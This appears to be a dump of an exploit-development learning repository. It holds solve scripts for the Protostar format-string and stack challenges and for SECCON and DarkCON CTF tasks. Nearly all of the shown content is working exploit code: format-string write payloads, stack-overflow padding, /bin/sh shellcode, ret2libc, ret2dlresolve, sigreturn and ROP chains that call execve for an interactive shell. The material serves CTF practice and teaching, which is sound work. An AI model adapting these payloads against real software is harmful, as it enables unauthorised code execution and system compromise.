" 108 | "position {1} in pattern.".format(sys.argv[1], found) 109 | ) 110 | except WasNotFoundException as e: 111 | print(e) 112 | sys.exit(1) 113 | except (ValueError, TypeError): 114 | print("Unable to convert hex input for searching. Invalid hex?") 115 | sys.exit(1) 116 | -------------------------------------------------------------------------------- /protostar/format/0format.exp: -------------------------------------------------------------------------------- 1 | ./format0 $(python -c 'print "%64s\xef\xbe\xad\xde"') 2 | -------------------------------------------------------------------------------- /protostar/format/1format.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | #context.log_level = 'DEBUG' 5 | 6 | payload = b'\x38\x96\x04\x08' 7 | payload += b'BBBB' 8 | payload += b' %141$n'*200 9 | 10 | p = process(['./format1',payload],stdin=PTY) 11 | print('\n'+p.recv().decode('latin-1').split('\n')[-2][-31:]) 12 | 13 | 14 | # ./format1 "$(python -c "print ''+'\x38\x96\x04\x08'+'BBBBBBB'+'%141\$n '*200")" 15 | -------------------------------------------------------------------------------- /protostar/format/2format.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | #context.log_level = 'DEBUG' 5 | p = process('./format2') 6 | 7 | payload = '\xe4\x96\x04\x08' # 0x080496e4 # 4 bytes 8 | payload += 'C'*60 # 60 bytes 9 | payload += '%4$n' 10 | 11 | p.sendline(payload) 12 | print('\n'+p.recv().decode('latin-1')) 13 | -------------------------------------------------------------------------------- /protostar/format/3format.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | ''' 3 | 16930116 - 0x01025544 --> target need to be 4 | ''' 5 | 6 | payload = b'\xf4\x96\x04\x08' # 080496f4 --> 4 bytes 7 | payload += b'%12$16930112x' # 16930116 - 4 --> 16930112 8 | payload += b'%12$n' # so total 16930116 which is 0x01025544 in hex 9 | 10 | open('payload3','wb').write(payload) 11 | 12 | import os 13 | os.system('./format3 < payload3') 14 | -------------------------------------------------------------------------------- /protostar/format/4format.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import os 3 | 4 | exit_plt = 0x8049724 # \x24\x97\x04\08 5 | hello = 0x80484b4 # \xb4\x84\x04\x08 6 | 7 | 8 | payload = b'\x24\x97\x04\x08' # 0x8049724 --> for last two bytes 0x000084b4 9 | payload += b'\x26\x97\x04\x08' # 0x8049726 --> added +2 bytes to write 0x_____84b4 this remaining bytes 10 | payload += b'%4$33964x' 11 | payload += b'%4$n' 12 | payload += b'%5$33616x' # see below 13 | ''' 14 | >>> 0x84be-0x10804 15 | -33606 + 16 = 0x804 --> first two bytes 16 | ''' 17 | payload += b'%5$n' 18 | 19 | open('payload4','wb').write(payload) 20 | 21 | os.system('./format4 < payload4') 22 | 23 | 24 | -------------------------------------------------------------------------------- /protostar/format/challenge binaries/format0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/format/challenge binaries/format0 -------------------------------------------------------------------------------- /protostar/format/challenge binaries/format1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/format/challenge binaries/format1 -------------------------------------------------------------------------------- /protostar/format/challenge binaries/format2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/format/challenge binaries/format2 -------------------------------------------------------------------------------- /protostar/format/challenge binaries/format3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/format/challenge binaries/format3 -------------------------------------------------------------------------------- /protostar/format/challenge binaries/format4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/format/challenge binaries/format4 -------------------------------------------------------------------------------- /protostar/stack/challenge binaries/stack0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack0 -------------------------------------------------------------------------------- /protostar/stack/challenge binaries/stack1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack1 -------------------------------------------------------------------------------- /protostar/stack/challenge binaries/stack2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack2 -------------------------------------------------------------------------------- /protostar/stack/challenge binaries/stack3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack3 -------------------------------------------------------------------------------- /protostar/stack/challenge binaries/stack4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack4 -------------------------------------------------------------------------------- /protostar/stack/challenge binaries/stack5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack5 -------------------------------------------------------------------------------- /protostar/stack/challenge binaries/stack6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack6 -------------------------------------------------------------------------------- /protostar/stack/challenge binaries/stack7: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack7 -------------------------------------------------------------------------------- /protostar/stack/stack0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | p = process('./stack0') 5 | 6 | payload = b'A'*100 7 | 8 | p.sendline(payload) 9 | print(p.recv().decode()) 10 | -------------------------------------------------------------------------------- /protostar/stack/stack1.exp: -------------------------------------------------------------------------------- 1 | ./stack1 $(python -c "print 'A'*64 + 'dcba'") -------------------------------------------------------------------------------- /protostar/stack/stack2.exp: -------------------------------------------------------------------------------- 1 | export GREENIE=$(python -c "print 'A'*64 + '\n\r\n\r'") -------------------------------------------------------------------------------- /protostar/stack/stack3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | p = process('./stack3') 5 | 6 | payload = b'A'*64 # padding 7 | payload += p32(0x8048424) # ret addr 8 | 9 | p.sendline(payload) 10 | print(p.recv().decode()) -------------------------------------------------------------------------------- /protostar/stack/stack4.exp: -------------------------------------------------------------------------------- 1 | python -c "print 'A'*76 + '\xf4\x83\x04\x08'" | ./stack4 -------------------------------------------------------------------------------- /protostar/stack/stack5.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | #context.log_level = 'DEBUG' 5 | context.binary = ELF('./stack5') 6 | p = process() 7 | 8 | payload = b'\x90'*30 9 | payload += b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80' 10 | payload += b'A'*(76-len(payload)) 11 | payload += b'\x8c\xd5\xff\xff' 12 | 13 | p.send(payload) 14 | #open('payload_5','wb').write(payload) 15 | p.interactive() 16 | 17 | # this payload not working while running this script 18 | # so uncomment 14th line and run 19 | # (cat payload_5;cat) | ./stack5 20 | # this command 21 | -------------------------------------------------------------------------------- /protostar/stack/stack6.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | p = process('./stack6') 5 | 6 | libc_base = 0xf7dbb000 7 | binsh = libc_base + 0x18f924 8 | system = libc_base + 0x00045160 9 | 10 | payload = b'A'*80 11 | payload += p32(system) 12 | payload += p32(0x0) 13 | payload += p32(binsh) 14 | 15 | p.sendline(payload) 16 | p.interactive() 17 | -------------------------------------------------------------------------------- /protostar/stack/stack7.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | p = process('./stack6') 5 | 6 | libc_base = 0xf7dbb000 7 | binsh = libc_base + 0x18f924 8 | system = libc_base + 0x00045160 9 | 10 | payload = b'A'*80 11 | payload += p32(system) 12 | payload += p32(0x0) 13 | payload += p32(binsh) 14 | 15 | p.sendline(payload) 16 | p.interactive() 17 | -------------------------------------------------------------------------------- /pwn 101 TamilCTF session.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/pwn 101 TamilCTF session.pdf -------------------------------------------------------------------------------- /pwn101 banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/pwn101 banner.png -------------------------------------------------------------------------------- /pwncode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import sys 3 | import os 4 | from pwn import log 5 | 6 | cwd = os.getcwd() 7 | try: 8 | binary = sys.argv[1] 9 | exploit_script = sys.argv[2] 10 | 11 | except: 12 | log.critical('pass arguments man!!!') 13 | log.info('argv [1] => binary file') 14 | log.info('argv [2] => solve script name (optional)') 15 | if binary: 16 | exploit_script = 'solve.py' 17 | pass 18 | else: 19 | sys.exit() 20 | 21 | template = f'''#!/usr/bin/python3 22 | from pwn import * 23 | 24 | elf = context.binary = ELF('{binary}',checksec=False) 25 | rop = ROP(elf) 26 | p = elf.process() 27 | 28 | ## pwncode[H4ppy_pWn1nG] 29 | ''' 30 | 31 | open(cwd+'/'+exploit_script,'w').write(template) 32 | os.system(f'subl {cwd}/{exploit_script}') 33 | # a small script to generate solve.py 34 | # copy this file to /usr/bin/pwncode 35 | -------------------------------------------------------------------------------- /random_pwn_challs/ret2dlresolve/seccon_2021_kasu_bof.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF('./chall') # 136 EIP 5 | p = process() 6 | rop = ROP(elf) 7 | # p = remote('hiyoko.quals.seccon.jp',9001) 8 | 9 | dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh']) 10 | 11 | rop.raw('A'*136) 12 | rop.gets(dlresolve.data_addr) 13 | rop.ret2dlresolve(dlresolve) 14 | log.info(rop.dump()) 15 | 16 | p.sendline(rop.chain()) 17 | p.sendline(dlresolve.payload) 18 | p.sendline(dlresolve.payload) 19 | 20 | p.interactive() 21 | 22 | # https://github.com/sajjadium/ctf-archives/raw/main/SECCON/2021/pwn/kasu_bof/chall 23 | # challenge download link ^ 24 | -------------------------------------------------------------------------------- /random_pwn_challs/sigrop/DarkCon_2021_easy_rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | elf = context.binary = ELF('easy-rop',checksec=False) 5 | p = elf.process() 6 | 7 | pop_rax = 0x00000000004175eb 8 | pop_rdi = 0x000000000040191a 9 | syscall = 0x000000000041e394 10 | bss = 0x00000000004c2220 11 | 12 | frame = SigreturnFrame() 13 | frame.rax = 0x3b 14 | frame.rdi = bss 15 | frame.rsi = 0x0 16 | frame.rdx = 0x0 17 | frame.rip = syscall 18 | 19 | payload = b'A'*72 20 | payload += p64(pop_rdi) 21 | payload += p64(bss) 22 | payload += p64(elf.sym['gets']) 23 | payload += p64(pop_rax) 24 | payload += p64(0xf) # sig return syscall 25 | payload += p64(syscall) 26 | payload += bytes(frame) 27 | 28 | open('payload','wb').write(payload) 29 | p.sendline(payload) 30 | p.sendline('/bin/sh\x00') 31 | p.interactive() 32 | 33 | # https://github.com/sajjadium/ctf-archives/raw/main/darkCON/2021/pwn/Easy-ROP/easy-rop 34 | # challenge download link ^ 35 | -------------------------------------------------------------------------------- /roadmap.md: -------------------------------------------------------------------------------- 1 | ### Road map to learn binary exploitation 2 | 3 | wait... 4 | -------------------------------------------------------------------------------- /stack_master/README.md: -------------------------------------------------------------------------------- 1 | | Challenges | Download | Writeup | Exploit | 2 | |-|-|-|-| 3 | |easy rop| [link](https://github.com/jopraveen/exploit-development/raw/main/stack_master/easy-rop/easy-rop)| 4 | |string editor 1| 5 | |string editor 2| 6 | |guess| 7 | |moving signals| 8 | |some really ordinary program| 9 | -------------------------------------------------------------------------------- /stack_master/easy-rop/easy-rop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/stack_master/easy-rop/easy-rop -------------------------------------------------------------------------------- /stack_master/easy-rop/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('easy-rop',checksec=False) 4 | rop = ROP(elf) 5 | p = elf.process() 6 | 7 | # required things 8 | pop_rdi = rop.find_gadget(['pop rdi','ret'])[0] 9 | pop_rax = rop.find_gadget(['pop rax','ret'])[0] 10 | syscall = rop.find_gadget(['syscall','ret'])[0] 11 | pop_rsi = 0x000000000040f4be 12 | pop_rdx = 0x000000000040181f 13 | mov_rdi_rsi = 0x000000000047695e 14 | mov_rsi_rax = 0x0000000000481e65 15 | data_section = 0x004c00e0 16 | 17 | # execve 18 | payload = flat( 19 | b'A'*72, 20 | pop_rax, 21 | u64('/bin/sh\x00'), 22 | pop_rsi, 23 | data_section, 24 | mov_rsi_rax, 25 | mov_rdi_rsi, 26 | 27 | pop_rax, 28 | 0x3b, 29 | pop_rsi, 30 | 0x0, 31 | pop_rdx, 32 | 0x0, 33 | 34 | syscall 35 | ) 36 | 37 | input() 38 | p.sendlineafter('name:',payload) 39 | p.interactive() 40 | 41 | # execve('/bin/sh',0,0); 42 | # rax = 59 43 | # rsi = 0 44 | # rdx = 0 45 | 46 | # rdi = '/bin/sh' -> pointer 47 | # syscall 48 | --------------------------------------------------------------------------------